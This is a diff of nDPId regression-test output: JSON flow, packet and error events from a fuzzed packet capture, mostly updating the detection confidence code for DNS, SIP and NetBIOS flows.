00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1120470490640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470490640,"pkt":"ADBUADRWAODlAW69CABFAABEa2cAAIARS+7AqAECwKgBAQrmADUAMMHtYusAAAABAAAA6QAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470490642} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470490640,"pkt":"AJLtAW69ADBUADRWCABFAABbAABADUARtz7AqAEBwKgBAgA1CuYAR6QBYuuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1120470490782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470490782,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwCVzABPEE8QB7RaaU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3OCBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9M2EyZDBkYw0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0NC5kaz47dGFnPTAwLTk0JXMALTE3MDFiNmFiLTEzOTM1YzgzNA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyYWNlaXZlZD04MC4yMzAuMjE5cjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5SEc0YktucDYxMDAxODczLTQzYmViWWE1MTkyLjE2OC4xLjINCldXVy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9mY2U9IjE3MDFiNjliNDdiNTFjNmQ2NmM5ZTQ1MDNjNjc5YzIiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG30TUQ1DQpDb250ZW50Lf5lbmd0aDogMA0KDQo="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1120470491041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470491041,"pkt":"ADBUADRWAODtAW69CABFAABIa2kAAIARS+jAqE8CwKgBAQrnADUANKZlgusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1120470492042,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIa2oAAIARS+fAqAE1wKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470494045} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIayVzAIARS+bAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1120470494127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470494127,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa2wAAIARSuHAqAECwMIB\/wCJAIkAOltkhTcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470495627,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1120470495627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470495627,"pkt":"\/\/\/\/\/\/\/\/AODtNm69CABFAABOe24AAIARSt+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1120470496048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470496048,"pkt":"ADBUADRWAODtAVW9CABFAABIa28AAIARS+LAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAghAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2081,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2081,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1120469540839,"flow_last_seen":1120470494876,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2242,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1120469540839,"flow_last_seen":1120470494876,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2242,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1120470501450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470501450,"pkt":"ADBUADRWAODtAW69CABFAABIa3QAAIARS93AqAECwKhDAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaSVzAHliZXJjaaqqqqqqqqqqqqo="} 